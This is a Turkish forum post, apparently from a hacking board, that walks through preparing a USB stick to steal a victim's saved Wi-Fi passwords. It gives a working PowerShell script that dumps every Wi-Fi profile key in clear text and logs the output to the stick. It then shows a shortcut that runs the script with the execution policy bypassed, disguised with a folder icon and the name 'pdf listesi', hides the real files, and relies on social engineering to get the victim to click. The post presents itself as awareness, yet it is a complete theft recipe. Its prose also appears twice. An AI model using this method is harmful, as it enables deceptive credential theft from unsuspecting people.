Logarech
▐━━━━━━━━━▌
- Mesajlar
- 174
- En iyi cevaplar
- 0
- Beğeniler
- 112
- Puanları
- 790
- Ruh hali
Bu yazıda basit bir senaryo ile hedef bilgisayarın bağlandığı ve diğer kayıtlı wifi parolalarını nasıl ele geçirebileceğimizden bahsedeceğim. Yazıdaki amacım veriler ne kadar güvende olursa olsun veri hırsızlığının bu yönden bakınca aslında ne kadar basit olduğunu göstermek ve bu nedenle bilmediğimiz USB, SD card veya taşınabilir hard disk gibi cihazları neden bilgisayarımıza takmamamız gerektiğini anlatmak. Kısaca senaryomuz şöyle:
Hedef bilgisayara script ile hazırladığımız USB belleğimizi takıp scripti çalıştırma dosyasını sıradan bir dosyaymış gibi manipüle edip karşı tarafın kendi eliyle çalıştırmasını sağlamak böylece kayıtlı wifi parolalarını usb bellek içine kaydetmek.
Öncelikle belleğimizi hazırlayalım. Boş bir metin belgesi açıyoruz ve kısa süren araştırma sonucu bulduğum PowerShell scriptini kopyalıyoruz:
Bize istediğimizi gösterecek kodlar bunlar ancak çıktısını daha sonra kendi bilgisayarımızda da görebilmek için belleğin herhangi bir yerine kaydetmek için:
En üst satıra
En alt satıra
kodlarını ekliyoruz. Dosya yolunu belleğin içinde olması şartıyla istediğiniz klasörde seçebilirsiniz. Daha sonra farklı kaydet diyip script.ps1 olarak kaydediyoruz. ps1, PowerShell komutlarını toplu halde çalıştırmak için kullandığımız bir dosya uzantısı. Scriptimizi aşağıdaki örnekte görüldüğü gibi hazırladık. (Dosya yolunu değiştirmeniz gerekebilir.)
Sırada scripti karşı tarafın çalıştırması için bir kısayol oluşturacağız. Bu kısayolu sıradan bir klasörmüş gibi göstereceğiz.
script.ps1 dosyamıza sağ tıklayıp kısayol oluşturuyoruz ve oluşturduğumuz kısayolun özelliklerini açıyoruz.
Hedef kısmına
yazıp ( “-ExecutionPolicy Bypass” parametresini PowerShell’in yürütme politikasını bypass etmek için yazdık) çalıştır kısmından da küçültülmüş modu seçiyoruz. Klasör gibi gözükmesi için de simge değiştir kısmından şu dosya yolunu aratıp klasör ikonunu seçiyoruz.
“script.ps1” dosyasını ve “bilgi” klasörünü gizledikten sonra belleğimiz sıradan bir cihaz gibi gözükecektir.
Bu işlemlerden sonra herhangi bir sosyal mühendislik yöntemiyle hedef kullanıcının “pdf listesi” ne tıkladığı anda parolalar, bilgiler klasöründeki bilgi.txt dosyasına yazılacak.
Görüldüğü üzere güvenlik önlemleri ne kadar alınırsa alınsın örneğin parolanın uzunluğu veya şifreleme yöntemi vs. bu senaryodaki gibi çok basit işlemler ile bilgiler ele geçirilebilir. Üstelik biz burada sadece erişim gerektiren PowerShell scripti ile wifi parolalarını çektik. Daha gelişmiş scriptler ve USB takılır takılmaz çalışan zararlı yazılımlar ile bilmediğimiz USB’yi bilgisayarımıza takmak aklımıza gelemeyecek kadar kötü sonuçlar doğurabilir.
Hedef bilgisayara script ile hazırladığımız USB belleğimizi takıp scripti çalıştırma dosyasını sıradan bir dosyaymış gibi manipüle edip karşı tarafın kendi eliyle çalıştırmasını sağlamak böylece kayıtlı wifi parolalarını usb bellek içine kaydetmek.
Öncelikle belleğimizi hazırlayalım. Boş bir metin belgesi açıyoruz ve kısa süren araştırma sonucu bulduğum PowerShell scriptini kopyalıyoruz:
Kod:
$listProfiles = netsh wlan show profiles | Select-String -Pattern "All User Profile" | %{ ($_ -split ":")[-1].Trim() };
$listProfiles | foreach {
$profileInfo = netsh wlan show profiles name=$_ key="clear";
$SSID = $profileInfo | Select-String -Pattern "SSID Name" | %{ ($_ -split ":")[-1].Trim() };
$Key = $profileInfo | Select-String -Pattern "Key Content" | %{ ($_ -split ":")[-1].Trim() };
[PSCustomObject]@{
WifiProfileName = $SSID;
Password = $Key
}
}
Bize istediğimizi gösterecek kodlar bunlar ancak çıktısını daha sonra kendi bilgisayarımızda da görebilmek için belleğin herhangi bir yerine kaydetmek için:
En üst satıra
Kod:
Start-Transcript -Path "DOSYA YOLU"
En alt satıra
Kod:
Stop-Transcript
kodlarını ekliyoruz. Dosya yolunu belleğin içinde olması şartıyla istediğiniz klasörde seçebilirsiniz. Daha sonra farklı kaydet diyip script.ps1 olarak kaydediyoruz. ps1, PowerShell komutlarını toplu halde çalıştırmak için kullandığımız bir dosya uzantısı. Scriptimizi aşağıdaki örnekte görüldüğü gibi hazırladık. (Dosya yolunu değiştirmeniz gerekebilir.)
Sırada scripti karşı tarafın çalıştırması için bir kısayol oluşturacağız. Bu kısayolu sıradan bir klasörmüş gibi göstereceğiz.
script.ps1 dosyamıza sağ tıklayıp kısayol oluşturuyoruz ve oluşturduğumuz kısayolun özelliklerini açıyoruz.
Hedef kısmına
Kod:
powershell.exe -ExecutionPolicy Bypass -File "F:\script.ps"
yazıp ( “-ExecutionPolicy Bypass” parametresini PowerShell’in yürütme politikasını bypass etmek için yazdık) çalıştır kısmından da küçültülmüş modu seçiyoruz. Klasör gibi gözükmesi için de simge değiştir kısmından şu dosya yolunu aratıp klasör ikonunu seçiyoruz.
Kod:
%SystemRoot%\System32\SHELL32.dll
“script.ps1” dosyasını ve “bilgi” klasörünü gizledikten sonra belleğimiz sıradan bir cihaz gibi gözükecektir.
Bu işlemlerden sonra herhangi bir sosyal mühendislik yöntemiyle hedef kullanıcının “pdf listesi” ne tıkladığı anda parolalar, bilgiler klasöründeki bilgi.txt dosyasına yazılacak.
Görüldüğü üzere güvenlik önlemleri ne kadar alınırsa alınsın örneğin parolanın uzunluğu veya şifreleme yöntemi vs. bu senaryodaki gibi çok basit işlemler ile bilgiler ele geçirilebilir. Üstelik biz burada sadece erişim gerektiren PowerShell scripti ile wifi parolalarını çektik. Daha gelişmiş scriptler ve USB takılır takılmaz çalışan zararlı yazılımlar ile bilmediğimiz USB’yi bilgisayarımıza takmak aklımıza gelemeyecek kadar kötü sonuçlar doğurabilir.